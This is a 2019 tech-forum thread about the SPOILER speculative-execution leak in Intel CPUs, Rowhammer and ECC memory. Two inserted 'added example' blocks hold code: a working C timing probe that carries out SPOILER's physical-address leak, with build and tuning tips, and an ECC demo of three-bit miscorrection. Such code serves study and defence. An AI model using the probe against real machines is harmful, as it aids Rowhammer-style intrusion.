New Speculative Execution Bug Allegedly Affects Intel CPUs

Discussion in 'HardForum Tech News' started by AlphaAtlas, Mar 6, 2019.

  1. AlphaAtlas

    AlphaAtlas [H]ard|Gawd Staff Member

    Messages:
    1,713
    Joined:
    Mar 3, 2018
    Back in 2018, when the Spectre and Meltdown vulnerabilities were first publicized, many security experts feared that they opened a figurative Pandora's box. Those two exploits are part of a wider class of potential speculative execution flaws, and this week, those fears were realized, as researchers from Worcester Polytechnic Institute have revealed a new speculative execution exploit dubbed "Spoiler."

    Intel CPUs reportedly use "dependency resolution logic" to resolve false dependencies when speculatively executing load operations, and the researchers say "the dependency resolution logic suffers from an unknown false dependency independent of the 4K aliasing. The discovered false dependency happens during the 1 MB aliasing of speculative memory accesses which is exploited to leak information about physical page mappings." In that vein, the researchers claim this particular exploit only requires "a limited set of instructions," and that all Intel "Core" CPUs running on any operating system are vulnerable to the attack. The attack can be loaded with JavaScript code from a website, without any need for privilege escalation beforehand, and the researchers successfully demonstrated the exploit on Nehalem, Sandy Bridge, and Ivy Bridge-based Xeon servers. Intel was reportedly informed of the exploit on December 1st, 2018, and they recently published this response:

    Intel received notice of this research, and we expect that software can be protected against such issues by employing side channel safe software development practices. This includes avoiding control flows that are dependent on the data of interest. We likewise expect that DRAM modules mitigated against Rowhammer style attacks remain protected. Protecting our customers and their data continues to be a critical priority for us and we appreciate the efforts of the security community for their ongoing research.

    The research paper's conclusion:

    While speculative execution enables both SPOILER and Spectre and Meltdown, our newly found leakage stems from a completely different hardware unit, the Memory Order Buffer. We exploited the leakage to reveal information on the 8 least significant bits of the physical page number, which are critical for many microarchitectural attacks such as Rowhammer and cache attacks. We analyzed the causes of the discovered leakage in detail and showed how to exploit it to extract physical address information. Further, we showed the impact of SPOILER by performing a highly targeted Rowhammer attack in a native user-level environment. We further demonstrated the applicability of SPOILER in sandboxed environments by constructing efficient eviction sets from JavaScript, an extremely restrictive environment that usually does not grant any access to physical addresses. Gaining even partial knowledge of the physical address will make new attack targets feasible in browsers even though JavaScript-enabled attacks are known to be difficult to realize in practice due to the limited nature of the JavaScript environment. Broadly put, the leakage described in this paper will enable attackers to perform existing attacks more efficiently, or to devise new attacks using the novel knowledge.
     
    Last edited: Mar 6, 2019
    PaulP likes this.
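An added example, not code from the post above, from the SPOILER paper or from Intel: the measurement loop that the description above boils down to, written in C for Linux on x86. It assumes 4 KB pages, a 64-store window issued to the pages following the probed one, `rdtscp` for timing and a "more than twice the median" rule for calling a page a peak; the window size, direction and threshold are choices made here, not figures from the paper. Every store lands at the same page offset as the later load, so all of them 4K-alias it; the stores whose physical address also matches the load in bits 12 to 19 (the 1 MB aliasing the post mentions) trip the false dependency in the memory order buffer and delay the load, so those pages show up as latency peaks. One pass is noisy, so repeat it, and remember the peaks only tell you which pages share those eight physical-address bits, not their absolute value.

```c
/* Added example (not from the thread or the SPOILER paper): the SPOILER
 * timing loop plus a peak finder. Assumed parameters: 4 KB pages, a
 * 64-store window, rdtscp timing, 2x-median peak threshold. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <sys/mman.h>
#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
#endif
#ifndef MAP_ANONYMOUS
#define MAP_ANONYMOUS MAP_ANON
#endif

#define PAGE_SIZE 4096
#define WINDOW    64      /* stores issued before the probed load (assumed) */

/* rdtscp on x86 (it waits for earlier loads before reading the counter);
 * clock_gettime elsewhere so the file still builds on other ISAs. */
static inline uint64_t timer(void) {
#if defined(__x86_64__) || defined(__i386__)
    unsigned int aux;
    return __rdtscp(&aux);
#else
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
#endif
}

/* For each page p: store to the next WINDOW pages at the same page offset
 * (so every store 4K-aliases the load), then time a load from page p.
 * A store whose physical address also matches the load in bits 12..19
 * (1 MB aliasing) triggers the false dependency and delays the load. */
void spoiler_measure(uint8_t *buf, size_t npages, uint32_t *lat) {
    volatile uint8_t *v = buf;
    memset(lat, 0, npages * sizeof *lat);      /* last WINDOW pages stay 0 */
    for (size_t p = 0; p + WINDOW < npages; p++) {
        for (size_t i = WINDOW; i > 0; i--)
            v[(p + i) * PAGE_SIZE] = (uint8_t)i;
        uint64_t t0 = timer();
        uint8_t x = v[p * PAGE_SIZE];
        uint64_t t1 = timer();
        (void)x;
        lat[p] = (uint32_t)(t1 - t0);
    }
}

static int cmp_u32(const void *a, const void *b) {
    uint32_t x = *(const uint32_t *)a, y = *(const uint32_t *)b;
    return (x > y) - (x < y);
}

/* Flag pages whose load latency is more than twice the median. Those are
 * the pages whose physical page number shares bits 12..19 with one of the
 * pages stored to in the window. Returns the number of peaks written. */
size_t find_peaks(const uint32_t *lat, size_t n, size_t *peaks, size_t max_peaks) {
    if (n == 0) return 0;
    uint32_t *sorted = malloc(n * sizeof *sorted);
    if (!sorted) return 0;
    memcpy(sorted, lat, n * sizeof *sorted);
    qsort(sorted, n, sizeof *sorted, cmp_u32);
    uint32_t median = sorted[n / 2];
    free(sorted);
    size_t k = 0;
    for (size_t i = 0; i < n && k < max_peaks; i++)
        if (lat[i] > 2 * median) peaks[k++] = i;
    return k;
}

int main(void) {
    size_t npages = 1024;                            /* 4 MB scan */
    uint8_t *buf = mmap(NULL, npages * PAGE_SIZE, PROT_READ | PROT_WRITE,
                        MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED) { perror("mmap"); return 1; }
    memset(buf, 1, npages * PAGE_SIZE);              /* fault every page in */
    uint32_t *lat = calloc(npages, sizeof *lat);
    size_t *peaks = calloc(npages, sizeof *peaks);
    spoiler_measure(buf, npages, lat);
    size_t n = find_peaks(lat, npages, peaks, npages);
    printf("%zu peak pages out of %zu\n", n, npages);
    for (size_t i = 0; i < n && i < 16; i++)
        printf("page %5zu  latency %u\n", peaks[i], lat[peaks[i]]);
    free(lat); free(peaks); munmap(buf, npages * PAGE_SIZE);
    return 0;
}
```

Build with `gcc -O1 spoiler_probe.c -o spoiler_probe` (no `-O3`, which may hoist the stores); the `volatile` pointer keeps the stores and the probed load in the instruction stream. Without the `rdtscp` path the timing resolution is too coarse to see anything, so treat the non-x86 branch as a build convenience only.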
  2. seanreisk

    seanreisk Gawd

    Messages:
    960
    Joined:
    Aug 29, 2011
    I know it isn't likely to affect me in a meaningful way, but now some of the luster is gone from my beautiful new computer. :(
     
  3. celeron300

    celeron300 Gawd

    Messages:
    514
    Joined:
    Jul 8, 2009
    Anyone on Hardocp have a suggestion? Aside from going AMD?
     
  4. sirmonkey1985

    sirmonkey1985 [H]ard|DCer of the Month - July 2010

    Messages:
    21,521
    Joined:
    Sep 13, 2008
    and just when you thought the waterfall dried up... it rains..


    While most of this stuff sounds bad, outside of corporate/business systems the risks are pretty low. I wouldn't go out and immediately buy an AMD system just because of these exploits, even though the fear mongers will say otherwise. No one cares enough about the average user's data when there are easier and cheaper ways to get your private information.
     
    Last edited: Mar 6, 2019
    M76 likes this.
  5. PeaKr

    PeaKr Gawd

    Messages:
    725
    Joined:
    Sep 6, 2004
    Disable JavaScript in your browser. I run with Palemoon along with the Toggle Javascript addon. I have trouble with a few sites; if I trust it I toggle JavaScript and reload. You could run a browser in a VM. A browser sandbox might also help, not sure.
     
  6. bobdabilder

    bobdabilder Limp Gawd

    Messages:
    291
    Joined:
    Oct 7, 2009
    I wouldn't go sticking my head in the sand.
     
  7. Legendary Gamer

    Legendary Gamer Gawd

    Messages:
    553
    Joined:
    Jan 14, 2012
    Any meaningful performance lead that Intel has, dies, if they patch all their security vulnerabilities. They just keep on coming too... It's been proven that Intel CPUs take massive hits from the previous threats. Stack this one on top and it gets even worse.

    HOWEVER, like others have said, this likely won't severely impact individual users. So, unless you're developing a new technology or are a professional writer and live and die by the content on your PC, you will probably be fine. I'm rolling with Intel because, currently, its fast single thread performance is where it's at for my older apps. Moving forward, if you don't already have a PC or are in the market looking for a new one, WAIT. 7nm Ryzen is 2-3 months away. AMD's processors have, essentially, proven to be almost bulletproof compared to Intel and they are committed to correcting the previously noted security flaws in their new hardware. Not that much of this really even affected them anyway, and their microcode updates that mitigate these issues rarely slow their CPUs down (the last one was something like a 3% slowdown compared to the 10-20+% slowdown Intel faced depending upon workload).

    I will stick with my Intel processors for now, however, Ryzen 7nm may very well change my mind.
     
  8. mesyn191

    mesyn191 2[H]4U

    Messages:
    2,983
    Joined:
    Jun 28, 2004
    This is grossly foolish to say.

    These attacks are going to get simplified, evolved, and distributed just like all the other exploits that have become available over the years and eventually make their way into the more common virus kits.

    There is nothing about them that prevents that sort of thing from happening and they're flat out too good to ignore by the virus writers and hackers.

    Doubly so if the researchers' claims about the unlikelihood of a microcode patch being effective hold up.
     
  9. BloodyIron

    BloodyIron 2[H]4U

    Messages:
    3,440
    Joined:
    Jul 11, 2005
    If you think this won't hit you, you're a fool. The fact this can be delivered through JavaScript means it can be injected into any hacked website and hit the masses. If you think the websites you visit are impenetrable, think again. Even websites like CNN have been hacked to deliver malicious code.

    The fact Intel still hasn't solved this at the silicon level clearly shows they don't actually care. Fuck you Intel.
     
  10. katanaD

    katanaD [H]ard|Gawd

    Messages:
    1,987
    Joined:
    Nov 15, 2016

    I would immediately unplug from the internet and format your computer, just to be sure

    you never know

    :ROFLMAO:
     
    Dayaks likes this.
  11. GHRTW

    GHRTW n00b

    Messages:
    37
    Joined:
    Aug 29, 2018
    7nm Rome chips cannot arrive soon enough for servers, cloud and data centers. Tables are turning hyper fast now...
     
  12. R_Type

    R_Type Limp Gawd

    Messages:
    213
    Joined:
    Mar 11, 2018
    I think the gist of it is there is no sandboxing this away. It's a very simple bit of code that reveals memory addresses, which are the keys to your whole system. The thing with all of these side channel attacks is that whereas your software is sandboxed/tightly controlled permissions and domains/whatever the hardware has none of these whatsoever in its prefetch/branch prediction/speculative execution units. So at a stroke all your security counts for diddly squat as key hardware blocks have an overview of everything everywhere and can be fooled into revealing everything at any time.
     
    Darth Kyrie and mesyn191 like this.
  13. arnemetis

    arnemetis 2[H]4U

    Messages:
    2,684
    Joined:
    Aug 2, 2004
    I'm trying this now, and it's effectively a worthless move. Every single website so far (hardforum for notifications, gmail, outlook.office.com, dropbox.com, google.com) has needed javascript to run correctly, and in several cases to run at all. If I'm just going to permit every website I visit to use it anyway, blocking it is somewhat stupid. I suppose it does prevent the random website you go to from running anything.
     
    Last edited: Mar 6, 2019
  14. kju1

    kju1 2[H]4U

    Messages:
    3,032
    Joined:
    Mar 27, 2002
    So you're saying all the individuals that were hit by ransomware were just dolphins caught in the whale net? Color me unimpressed. It's incredibly foolish imo to say only businesses have to worry about this. Your entire life is electronic now... see how much you'd like it if some enterprising enemy of yours decided he wanted to take everything and used a packaged up version of this to steal your shit.

    So your suggestion is to disable the internet?
     
  15. mesyn191

    mesyn191 2[H]4U

    Messages:
    2,983
    Joined:
    Jun 28, 2004
    In fairness to Intel they only learned about this exploit at the very end of last year.

    There wouldn't be enough time to implement a hardware fix of some sort in any of their upcoming or current CPUs.

    If the memory model itself requires large changes in order to implement a fix that doesn't cause any performance degradations then it'll take quite a while before you see a hardware fix.
     
  16. Legendary Gamer

    Legendary Gamer Gawd

    Messages:
    553
    Joined:
    Jan 14, 2012
    The words Fair and Intel rarely ever coexist together properly .... The problem I see with the "new transparency" Intel is pushing is that they've said Jack and shit about correcting any of these issues in their upcoming 10nm generation. If I recall correctly there was some article about how the fixes weren't making it into that generation. Perhaps on 7nm in 2020-2021... On the AMD side of the spectrum, AMD has already committed to correcting these issues.

    Intel cannot correct these security holes if they want to remain competitive vs AMD and they've already lost their process lead.

    Intel is in deep shit for sitting on their asses too long and not innovating.
     
  17. PaulP

    PaulP Gawd

    Messages:
    776
    Joined:
    Oct 31, 2016
    Since this new exploit is only useful to make other side-channel attacks more effective, deploying mitigations against those side-channel attacks is your only option right now.
     
  18. mesyn191

    mesyn191 2[H]4U

    Messages:
    2,983
    Joined:
    Jun 28, 2004
    I agree! However I think this may be one of those few times.

    Do you mean this one (SPOILER) only or Meltdown and Spectre too? I believe they haven't commented on SPOILER but hardware corrections for Meltdown and Spectre should be implemented for Icelake and Coffeelake already has them.

    Absolutely!

    I believe AMD has a real chance to get a decent chunk of both server and desktop marketshare from Intel thanks to their screw ups. Not sure about AMD's prospects in the laptop market on the other hand. AMD seems to be having a very hard time getting any traction there.

    As I understand it even with Spectre and Meltdown mitigations active SPOILER is still going to work unfortunately.

    That along with its reported ease of use and the difficulty (or perhaps impossibility if the researchers who developed SPOILER are correct) of Intel doing an effective microcode update is what is making it so very scary.
     
  19. R_Type

    R_Type Limp Gawd

    Messages:
    213
    Joined:
    Mar 11, 2018
    It isn't a simple fix. You could say they don't care or you could say it's a set of vulnerabilities that strike at the very heart of the means by which CPUs have been made faster for close to 15 years. The entire idea that speculative execution/memory prefetch/memory disambiguation could become a yawning security chasm was completely unforeseen until relatively recently and it took a good while to demonstrate proof of concept attacks. Now it's grown legs and there are attack vectors all over the place. It takes what.... 5 years to design and begin selling a CPU, and the IP in it has been worked on and iterated for a decade+, and now they have to go back and somehow make sweeping changes without affecting performance. That's a job that will take years to do. Not to mention rowhammer (spam memory cells with bits billions of times until they freak out and flip 0 to 1 or vice versa) which just about every CPU in at least the last decade is vulnerable to and will be an absolute bitch to fix (in hardware).
     
  20. Grimlaking

    Grimlaking 2[H]4U

    Messages:
    2,921
    Joined:
    May 9, 2006
    Running a VM will not solve these for you. As a VCP I guarantee that we have to patch at the host level for these and the feeling is NOT negligible.
     
  21. mesyn191

    mesyn191 2[H]4U

    Messages:
    2,983
    Joined:
    Jun 28, 2004
    This isn't correct. There are white papers from the P!!! and K7 Athlon era talking about doing attacks like this. And I can vaguely recall some people voicing worries about this sort of thing all the way back in the 90's when the Pentium Pro came out.

    It did take a long time to make those concepts into actual effective attacks but to say this was completely unforeseen is totally wrong. After all if it was totally unforeseen AMD's Zen would've been just as vulnerable to Spectre, Meltdown, and SPOILER. But it isn't.

    Intel was lax on security, favoring development efforts focused on performance and power usage, and now that mistake is coming back to bite them.

    Rowhammer is a memory flaw rather than a CPU flaw. Nothing Intel or AMD can really do to fix it. It's up to the DRAM OEMs to fix it. Maybe we'll see a fix with DDR5.

    What AMD or Intel can do is make it much harder for Rowhammer attacks to be successful by officially implementing and supporting ECC DRAM on all their products and not just server stuff. Technically and unofficially AMD already does and has done it for years, going on back to at least Bulldozer, they just don't guarantee it'll work properly 100% of the time on their consumer market stuff.

    Now some versions of Rowhammer apparently can work on even ECC DRAM but its a very slow process that can take weeks to be effective and I believe so far has only been shown to be effective on DDR3 ECC DRAM.
     
    Darth Kyrie and Red Falcon like this.
  22. R_Type

    R_Type Limp Gawd

    Messages:
    213
    Joined:
    Mar 11, 2018
    Thank you! I went and did some reading. You are correct. Learned something today.

    Re: rowhammer cpu vs ram problem. Well yes but ram is present in cpus, which I took as clear. Rowhammer flips bits.... to infer the contents of neighbouring memory cells. ECC has 2 problems vs rowhammer: flipping 3 or more bits defeats it (the tech needs improving) and it needs to be in every cache and dram pool on every cpu (cost). Like all side channel attacks rowhammer is evolving and has been demonstrated to affect ddr4. So whatever ddr5 brings to the table it better be pretty good.
     
    Red Falcon likes this.
  23. notarat

    notarat [H]ard|Gawd

    Messages:
    1,703
    Joined:
    Mar 28, 2010
    From what I read elsewhere, VM/Sandbox does not protect from this exploit. Don't have the link handy but I read this yesterday on /. so it's likely it was in the link there...
     
  24. Hakaba

    Hakaba Gawd

    Messages:
    639
    Joined:
    Jul 22, 2013
    I can see this being a pain for the home market. As for the server side, well, you shouldn't be web surfing from a core, application, file server etc...
     
  25. Grimlaking

    Grimlaking 2[H]4U

    Messages:
    2,921
    Joined:
    May 9, 2006
    Better tell that to every enterprise running VDIs (Virtual Desktops). Especially some of the smaller shops that might have a small VM cluster with independent VDIs for the users that commingle on their server VM hosts because it didn't make sense to buy more. Oh, and anyone running a virtual desktop, say, in the Amazon Cloud or any other cloud for that matter.
     
  26. BloodyIron

    BloodyIron 2[H]4U

    Messages:
    3,440
    Joined:
    Jul 11, 2005
    Speculative (Spectre/Meltdown) security threats have been known to intel for about two years now (or more perhaps behind closed doors). I have yet to see them come out with a silicon solution for _ANY_ of them. Until they actually come at their silicon from a security perspective, this will continue to get worse, and not be comprehensively addressed.

     
  27. BloodyIron

    BloodyIron 2[H]4U

    Messages:
    3,440
    Joined:
    Jul 11, 2005
    Yes I can say they don't care, because they've known about speculative exploits for about two years now, and they haven't put out ANY silicon solutions to mitigate them. That's negligent.

     
  28. arnemetis

    arnemetis 2[H]4U

    Messages:
    2,684
    Joined:
    Aug 2, 2004
    On the one hand I agree with you, this is unacceptable, should have dumped everything they had into a hardware level fix immediately. But on the other, I think the reality is this would take a redesign that will take years, if not decades, to implement. In the mean time, should they just shut down the fabs, produce nothing? When a solution is finally revealed that completely abandons speculative execution (the only real way to protect against this,) it will likely be many years from now, perform much worse than today's chips, and cost a fortune.
     
  29. ole-m

    ole-m Limp Gawd

    Messages:
    451
    Joined:
    Oct 5, 2015
    vm's do not protect against this.....
     
  30. jmilcher

    jmilcher [H]ardness Supreme

    Messages:
    4,306
    Joined:
    Feb 3, 2008
    Going AMD.

    I’ll be eagerly awaiting the Zen2 update this year with a motherboard that’s guaranteed to accept the cpu. My 2700x has been great so far.

    It’s been the first time I’ve built AMD since the Opteron 165 days.

    I’m done with the new monthly threats and performance robbing patches from intel.
     
    ccityinstaller likes this.
  31. NoOther

    NoOther [H]ardness Supreme

    Messages:
    6,477
    Joined:
    May 14, 2008
    I wouldn't hold your breath on that. The nature of these attacks and how they are pulled off, combined with the time frame you have to do an attack to get the information you are looking for, makes it hardly worth exploit writers' time. There is zero guarantee on the kind of information you could get, or that you get any useful information at all. So it really limits the targets for these attacks.
     
  32. Hakaba

    Hakaba Gawd

    Messages:
    639
    Joined:
    Jul 22, 2013
    Ohh I would, if you are running core services and desktops on the same server I believe that is a foul. The thin client/zero client/virtual solution should be separate even on the hardware level.

    As for Amazon, it will be interesting to see how that all plays out. Because meltdown has existed for several years and yet AWS is still here...
     
  33. Grimlaking

    Grimlaking 2[H]4U

    Messages:
    2,921
    Joined:
    May 9, 2006
    This last speculative execution CVE that came out late 2018 is only patched at the Hypervisor level. And if you have the patch enabled you only have access to your core CPUs, no Hyperthreaded Logical CPUs for you. My environment, due to what I do, was over built and ok. But can you imagine people using 4:1 overallocation on logical threads that are now simply screwed? It suddenly became 8:1.
     
  34. TordanGow

    TordanGow [H]ard|Gawd

    Messages:
    1,245
    Joined:
    May 25, 2015
    And to that I say GOOD! I'm glad to see Intel reaping what they sowed. The way I see it is they wanted to milk the consumer and intentionally neglected meaningful improvement due to no competition. They wanted to sell the same thing over and over year after year with minimal changes. My next PC will be AMD, my last one would have been but I couldn't get AMD parts timely to replace a dead PC as it died a few days after Ryzen launch. I'll intentionally be avoiding Intel products now. Their misfortune makes me smile.
     
    Darth Kyrie and Red Falcon like this.
  35. Krenum

    Krenum [H]ardForum Junkie

    Messages:
    15,560
    Joined:
    Apr 29, 2005
    AMD Zen 3 can't launch fast enough.
     
  36. Red Falcon

    Red Falcon [H]ardForum Junkie

    Messages:
    9,990
    Joined:
    May 7, 2007
    Even if x86-64 doesn't die from all of these flaws, ARM-based CPUs and AMD are going to continue moving forward.
    Good riddance, Intel.
     
    trparky likes this.
  37. jmilcher

    jmilcher [H]ardness Supreme

    Messages:
    4,306
    Joined:
    Feb 3, 2008
    Well it’s Zen2, which is the third gen of zen.
     
  38. Krenum

    Krenum [H]ardForum Junkie

    Messages:
    15,560
    Joined:
    Apr 29, 2005
    Technically yes, but it is the third chip in the line of Ryzen so I say Zen 3.
     
  39. fullvietFX

    fullvietFX [H]ard|Gawd

    Messages:
    1,785
    Joined:
    Sep 1, 2004
    Damnit lol. Just built my Intel rig.
     
  40. mesyn191

    mesyn191 2[H]4U

    Messages:
    2,983
    Joined:
    Jun 28, 2004
    That approach only works with DDR3 ECC DRAM so far.

    It hasn't been shown to work with DDR4 ECC DRAM. The DRAM OEMs were aware of Rowhammer type attacks in the early DDR3 days and hardened DDR4 ECC DRAM to make it at least resistant to it (they claim it's proofed against it). The guys who figured out how to do the 3 bit flip on DDR3 ECC DRAM claim DDR4 ECC DRAM is still susceptible to it, but it's been quite a while since those claims were made and no real world proof of concept of the attack has been successfully performed yet.

    So at a minimum DDR4 ECC DRAM (which is what Zen, Zen+, Zen2, Skylake, and so on all support) is fairly well hardened against that sort of attack and may indeed be actually completely proof against it.

    Actually Rowhammer attacks only work on system RAM and not the CPU caches.

    Rowhammer attacks won't work on the CPU caches because they're designed in a physically different manner. The actual transistors in the SRAM arrays in those caches are hardened against physical abuse like that and have much more stringent quality control too. Rowhammer only works at all because the DRAM industry was focused on trying to make memory as cheap as possible to improve their profits, so they cheaped out on durability and security and tried to maximize DRAM cell transistor density with further process shrinks.

    The DRAM OEMs already know how to prevent Rowhammer attacks from working, they just don't want to. Maybe with this latest attack they'll be embarrassed enough that they'll actually bother to really fix the problem with DDR5.

    But Coffeelake and Whiskeylake already have hardware mitigations against Meltdown and Spectre right?

    The researchers claim they were able to get successful attacks within seconds though. If it was taking weeks to perform a single successful attack then you'd have a point.

    Not really.

    A fast executing attack means the attack can be re-run over and over and over quickly without issue and "eventually" (in scare quotes because we're probably talking about a time frame of minutes, not hours or days or weeks) the attacker will find what they want.

    Zen+ was a bug fixed Zen along with a minor process improvement (it wasn't an optical shrink, so think of Globalfoundries "12nm" as a "14nm+" instead) rather than a new evolution of the Zen architecture.

    Zen2 actually has large and significant changes to the architecture itself and isn't just a bug fix or a shrink, so you should think of it as the 2nd generation core and not the 3rd.
     
    Darth Kyrie and CoreStoffer like this.
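An added example for the ECC discussion in post #22 ("flipping 3 or more bits defeats it") and post #40 (the 3-bit-flip attacks on ECC DRAM); it is not code from any post above, from the SPOILER paper or from a DRAM vendor. It is a toy SECDED Hamming code over a single byte: 8 data bits, 4 Hamming check bits and 1 overall parity bit, 13 bits in all, decoded with the same correct-one/detect-two rule as the (72,64) SECDED used on server DIMMs. The decoder repairs any single flip, refuses any double flip, and for a chosen triple of flips reports a successful correction while handing back a corrupted byte. That silent miscorrection is the whole point of the attacks the thread refers to: Rowhammer is used to flip three bits whose combined syndrome aliases a legitimate single-bit error. The bit positions and the sample byte are constructed for the demo; a real DIMM code is larger but fails the same way.

```c
/* Added example (not from the thread): a toy SECDED Hamming code showing
 * why 1 flip is corrected, 2 are detected and a chosen 3 are silently
 * miscorrected. Layout and sample bytes are constructed for the demo. */
#include <stdint.h>
#include <stdio.h>

enum ecc_status { ECC_OK = 0, ECC_CORRECTED = 1, ECC_UNCORRECTABLE = 2 };

#define CW_BITS 13                          /* codeword positions 0..12 */
#define CW_MASK ((1u << CW_BITS) - 1)

/* Positions 1..12 that are not powers of two carry data; 1, 2, 4, 8 carry
 * the Hamming check bits; position 0 carries the overall parity bit. */
static const int data_pos[8] = {3, 5, 6, 7, 9, 10, 11, 12};

static int parity13(uint32_t x) { return __builtin_parity(x & CW_MASK); }

uint32_t secded_encode(uint8_t data) {
    uint32_t cw = 0;
    for (int k = 0; k < 8; k++)
        if ((data >> k) & 1) cw |= 1u << data_pos[k];
    /* check bit at 2^j makes the parity of every position with bit j set even */
    for (int j = 0; j < 4; j++) {
        int p = 0;
        for (int i = 1; i <= 12; i++)
            if ((i & (1 << j)) && ((cw >> i) & 1)) p ^= 1;
        cw |= (uint32_t)p << (1 << j);
    }
    cw |= (uint32_t)parity13(cw);           /* even parity over all 13 bits */
    return cw;
}

/* SECDED decode. s = XOR of the positions of all set bits, p = parity of
 * the whole word. (s==0,p==0): clean. p==1: single error at position s
 * (s==0 means the parity bit itself), correct it. (s!=0,p==0): two errors,
 * uncorrectable. Three flips leave p==1 with a syndrome that can point at
 * an innocent bit, so the decoder "fixes" the wrong thing and says OK. */
enum ecc_status secded_decode(uint32_t cw, uint8_t *data) {
    int s = 0;
    for (int i = 1; i <= 12; i++)
        if ((cw >> i) & 1) s ^= i;
    int p = parity13(cw);
    enum ecc_status st = ECC_OK;
    if (p == 1) {
        if (s > 12) return ECC_UNCORRECTABLE;   /* syndrome outside the word */
        cw ^= 1u << s;
        st = ECC_CORRECTED;
    } else if (s != 0) {
        return ECC_UNCORRECTABLE;
    }
    uint8_t d = 0;
    for (int k = 0; k < 8; k++)
        if ((cw >> data_pos[k]) & 1) d |= (uint8_t)(1u << k);
    *data = d;
    return st;
}

/* Flip the given positions, standing in for Rowhammer-induced bit flips. */
uint32_t flip_bits(uint32_t cw, const int *pos, int n) {
    for (int i = 0; i < n; i++) cw ^= 1u << pos[i];
    return cw;
}

int main(void) {
    const uint8_t orig = 0xA5;                /* constructed sample byte */
    uint32_t cw = secded_encode(orig);
    uint8_t out = 0;
    const int one[1] = {7}, two[2] = {3, 5}, three[3] = {3, 5, 6};
    const char *names[] = {"ok", "corrected", "uncorrectable"};

    enum ecc_status st = secded_decode(flip_bits(cw, one, 1), &out);
    printf("1 flip:  %-13s data=0x%02x\n", names[st], out);
    st = secded_decode(flip_bits(cw, two, 2), &out);
    printf("2 flips: %-13s\n", names[st]);
    /* 3 ^ 5 ^ 6 == 0: syndrome blames the parity bit, three data bits stay wrong */
    st = secded_decode(flip_bits(cw, three, 3), &out);
    printf("3 flips: %-13s data=0x%02x (expected 0x%02x)\n", names[st], out, orig);
    return 0;
}
```

The triple {3, 5, 6} is chosen because the XOR of the three positions is zero, so the syndrome looks like a flipped parity bit; any triple whose XOR lands on another valid position works the same way, and an attacker who knows the code (it is not secret) can pick such triples for the rows they can hammer. This is also why "ECC" alone is a weak Rowhammer answer and why the post #40 caveat about which DDR generation has actually been broken matters.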